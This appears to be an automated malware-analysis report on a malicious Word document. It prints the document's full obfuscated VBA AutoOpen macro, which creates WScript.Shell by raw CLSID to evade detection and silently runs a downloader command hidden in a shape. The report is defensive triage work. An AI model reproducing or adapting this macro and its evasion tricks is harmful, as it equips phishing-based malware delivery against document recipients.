Risk Score: 252 (MALICIOUS)
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1218.011 System Binary Proxy Execution: Rundll32
The sample contains a VBA macro that uses GetObject("new:{CLSID}") to instantiate the dangerous WScript.Shell COM object by its raw CLSID (72C24DD5-D70A-438B-8A42-98424B88AFB8) instead of by ProgID. The command string it runs is assembled from the text of the document shape "NarmvINMqnkL" and passed to the object's Run method with window style 0 (hidden). The command appears to be a complex, obfuscated PowerShell one-liner that downloads and executes a second-stage payload from a URL, indicated by the string concatenation and the structure of the command.
Heuristics (9)

- ClamAV: Doc.Malware.Powload-6775323-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6775323-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script: `End Select Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt) On Error Resume Next`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
  Matched line in script: `End Select Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt) On Error Resume Next`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6806 bytes |

SHA-256: 59096927f01063a6d531abc24a0efba110199dbba5e8d713edde060972cd362e

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 109 of 163 identifiers look randomly generated (e.g. 'NarmvINMqnkL'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "qLWJVzw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case EdnbV
Case 171915710
Hmozd = 252445714
vKITZfT = CLng(53884184)
Case 32346758
zsUGkILW = Oct(PQKIKvSBC)
QqKmAppSm = diwYDbcG
Case 320116756
idbkWKk = CDate(zYGiR)
otpFTQ = Int(307001358 * ZjPjUlEiS)
End Select
On Error Resume Next
Select Case pwQwHwzdR
Case 147208844
mQMuHBZw = 276619519
RjWXGq = CLng(249665415)
Case 90566389
jBDlYYO = Oct(iifWOcKcJ)
JFWhnFj = NtaBHLP
Case 304863865
jiinVtHu = CDate(KrCHMv)
MbIACOwBA = Int(75997176 * TdWTHUp)
End Select
Set iNnPa = Shapes("NarmvINMqnkL")
On Error Resume Next
Select Case uaZBYjXFa
Case 2309754
pFHla = 205503100
kfYiITV = CLng(129520066)
Case 291203322
FaAwDSLU = Oct(lfQGI)
dHRPES = jMQOYMRF
Case 207604940
rkAzz = CDate(mnvRZ)
zUYPTfMDE = Int(263971796 * Pqoiouw)
End Select
cYarBTAmPGi = "" + fcIAP + wpJtlt + aYWIO + DPkJK + iNnPa.TextFrame.TextRange.Text + szOfnWvB + BLYbf
On Error Resume Next
Select Case bwCDpzB
Case 46729088
iOYKDUS = 154742898
BVcLLdXR = CLng(210548936)
Case 12300487
OzboO = Oct(WAAEh)
ihROR = lpWAZccz
Case 105486520
ZfYTzzPi = CDate(kwzwRWkU)
witOGj = Int(305416970 * lNawMR)
End Select
On Error Resume Next
Select Case Whjlq
Case 342307649
DsQwrp = 129312861
PimJGi = CLng(193695721)
Case 94406064
kCBfZlX = Oct(qRQjSTwXN)
UaFMQ = CwXBPrbsS
Case 49718789
nwldG = CDate(wBXDkzPnl)
ZIoXXlKdd = Int(92171677 * kzqXNKS)
End Select
On Error Resume Next
Select Case hPwhkLi
Case 111619465
TaBzMnzh = 272522927
bSoGsvat = CLng(136070643)
Case 270553890
zNjCM = Oct(JDBmZbQ)
ivdhu = BuEQC
Case 297611781
GmKRN = CDate(jWMUuzS)
dnwCrYzK = Int(338806946 * LanzDJQAT)
End Select
Set SKNLli = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + bcOhIKt)
On Error Resume Next
Select Case hNILcORwj
Case 272614853
iPEBQiVV = 110422557
IXJpcq = CLng(192569596)
Case 45411639
fKhua = Oct(WpShWM)
JMJLuG = VjnufZq
Case 338584135
AYnpiKZ = CDate(Udjtp)
otCuN = Int(321273322 * RvWkfvXn)
End Select
On Error Resume Next
Select Case niKHWz
Case 62712291
TQjUBr = 299574856
mjzzwP = CLng(28373123)
Case 133794171
ZzFZrHkb = Oct(ziAlnX)
WTwUaBaO = szUJMY
Case 175096216
awAEqbJws = CDate(sLKBsbMbw)
zGYXq = Int(54366830 * JPSzbHKKq)
End Select
On Error Resume Next
Select Case TqSuVzPp
Case 254953312
SRzFA = 18554173
ToXFNuKo = CLng(174765228)
Case 214726531
vMFcRRj = Oct(jJHwp)
qSuXnvG = hBabj
Case 44710062
IFvQtuZAq = CDate(iZATiMpif)
bPRmkOt = Int(204209981 * CqkZE)
End Select
On Error Resume Next
Select Case ILHuLLkSf
Case 35205140
XWQJQwWn = 95169026
AtrnN = CLng(51610355)
Case 130353324
zVZwREj = Oct(QStXnW)
wLDYzUWF = wqISPHwD
Case 112630638
fjPbELcBj = CDate(urSdL)
cJiUFdQrz = Int(179830947 * OzJTpGwqw)
End Select
Const wMizh = 0
On Error Resume Next
Select Case rFitF
Case 69091941
CImbX = 64553337
UEOAaa = CLng(117841373)
Case 256185431
OkQhQWAo = Oct(ThKAoRPHS)
wzQQiZKpJ = iLlEaUIoc
Case 254955387
IzjEcGUP = CDate(lTIRqhwUm)
FhrrR = Int(47664962 * FZUIaifTn)
End Select
On Error Resume Next
Select Case wPYnm
Case 153911123
UfjfS = 111806296
klvkoQG = CLng(78309060)
Case 316795503
pzNNtR = Oct(zRwFz)
aSEGBpA = sOpdX
Case 184530810
piAmTEzpJ = CDate(bNbfASVl)
VRjKF = Int(146015791 * SwiYjVpRK)
End Select
SKNLli.Run! cYarBTAmPGi, wMizh
On Error Resume Next
Select Case PuhqtZM
Case 99214300
wvzkicV = 303259403
CjINH = CLng(288308409)
Case 118798962
wYYaIh = Oct(NLBSQ)
bGQfpzpUm = msKuS
Case 100331047
mqYhb = CDate(qDpOzWTa)
dNaZs = Int(226264793 * tcrLRm)
End Select
On Error Resume Next
Select Case FEcrjzVY
Case 68880352
VWtVOWSwi = 159733432
XZVLL = CLng(50446225)
Case 204684516
iTqmaJ = Oct(DIOvSmdfc)
nsuMWRcG = iiGfUrp
Case 31625011
iijTMVSJ = CDate(jFOtusfX)
kGIBNf = Int(314139097 * OzctEch)
End Select
On Error Resume Next
Select Case SGSKm
Case 298416984
kESCTnbpu = 207580043
TjwWHJIYZ = CLng(59435681)
Case 137644640
cssnE = Oct(BmJzXl)
CoHdzUQwr = sKvwJBOU
Case 232688174
zqJbAW = CDate(ttlWLKW)
VBuco = Int(26556528 * lJzcIO)
End Select
On Error Resume Next
Select Case HjwSdjVD
Case 247477994
ltJQHiE = 34883385
fVuOTK = CLng(62508234)
Case 31716602
wiCqw = Oct(iYDItirw)
PHcjElL = LpQLNS
Case 187534503
UiUEH = CDate(vviljbv)
hnWYwL = Int(221072836 * AOnNqAh)
End Select
On Error Resume Next
Select Case XjaYisz
Case 311681866
ZfuOYk = 306694237
TSuutlcKv = CLng(166535911)
Case 292192121
clEtD = Oct(wUULp)
mtnPX = FuqmQ
Case 62710060
jizwO = CDate(TEvqnaAK)
naXIdo = Int(51301277 * wMmqTzJpU)
End Select
End Sub